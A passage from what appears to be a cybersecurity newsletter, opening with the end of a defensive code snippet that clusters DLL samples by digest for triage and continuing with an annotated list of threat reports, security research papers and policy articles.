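    corpus = {"legit": LEGIT_DLL, "proxy": PROXY_DLL, "other": OTHER_DLL}
    for digest, members in cluster(corpus).items():
        print(digest[:16], members)
```

The proxy DLL lands in the same cluster as the DLL it shadows, which is the pivot a triage pipeline can use to pull related samples together.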
Footnotes
Some other small (and not so small) bits and bobs which might be of interest.
Mobile cyberthreat report for 2022 - 1,661,743 malicious installers, 196,476 new mobile banking Trojans and 10,543 new mobile ransomware Trojans
The Red Report 2023 - based on an in-depth analysis of over 500,000 real-world malware samples collected from a wide range of sources.
2022 Year in Review: The DFIR Report - Our data show no significant change compared to our 2021’s “Year in review” report. The tactics, techniques and procedures have mostly stayed the same as the motivations behind the attacks drive the resulting outcomes. Deploying ransomware and exfiltrating sensitive data was the primary goal for most intrusions we reported. The “smash-and-grab” ransomware operations continue to impact organizations of any size.
Threat landscape for industrial automation systems for H2 2022 - dubious value in this data.
JSAC2023 Event Report - includes links to some English as well as Japanese material for the talks given
NDSS Symposium 2023 Program - some excellent papers from academia here.
There Is No Such Thing as Open Source Intelligence - This article argues that “open source intelligence (OSINT)” is a fundamentally incoherent concept that should be abandoned. It does so in two steps. First, by challenging the underlying criteria used to demarcate it as a separate “INT” among its more traditional peers. Second, through a historical critique that argues that “OSINT” as a conceptual category served a transitionary stage that has long passed.
Open-ended Working Group on security of and in the use of information and communications technologies (OEWG) - Chair’s letter from March 3rd
Efficiency, Equity, Quality And Security In International (Academic) Research - In its report, ARMA found that whilst the majority of research organisations have made progress in responding to the Trusted Research and security agenda, there are unique challenges relating to the complexity and cross-cutting nature of the legislation which make this different to other forms of due diligence.
Evaluating Escalation: Conceptualizing Escalation in an Era of Emerging Military Technologies - I introduce a means-based framework for characterizing escalation based on the degree to which actions are physically present and visible. Drawing from an original survey fielded on a cross-national sample of foreign policy experts, I construct a more complete escalation ladder in which more physically present and visible actions fall at higher rungs. This ladder suggests the need for more precise coding schemes than those found in widely cited militarized dispute datasets.
Opted Out, Yet Tracked: Are Regulations Enough to Protect Your Privacy? - Our results indicate that user data is unfortunately still being collected, processed, and shared even when users opt-out. Our findings suggest that several prominent advertisers (e.g., AppNexus, PubMatic) might be in potential violation of GDPR and CCPA. Overall, our work casts a doubt if regulations are effective at protecting users' online privacy.
Computational Language Acquisition with Theory of Mind - We find that training speakers with a highly weighted ToM listener component leads to performance gains in our image referential game setting. We also find some evidence that increasing task difficulty in the training process results in more fluent and precise utterances in evaluation. This suggests the potential utility of further incorporating ToM, as well as other insights from child language acquisition, into computational models of language acquisition.
How to avoid machine learning pitfalls: a guide for academic researchers - This document is a concise outline of some of the common mistakes that occur when using machine learning, and what can be done to avoid them
CISA Red Team Shares Key Findings to Improve Monitoring and Hardening of Networks - Despite having a mature cyber posture, the organization did not detect the red team’s activity throughout the assessment, including when the team attempted to trigger a security response - story of every red team ever..
This newsletter is produced by BinaryFirefly, it is via BinaryFirefly I support a hand picked set of organisations across investment, strategy and capability in the domain of cyber.
For sponsorship enquiries regarding Bluepurple or anything else contact hello@binaryfirefly.com.
Your Thurs brief is my next week worth of work...even traveled down a rabbit hole on one of your links a few months back and it turned into a goldmine of foreign intel..please don't stop and thank you for the effort here.
This is the best weekly I've seen and I read A LOT of them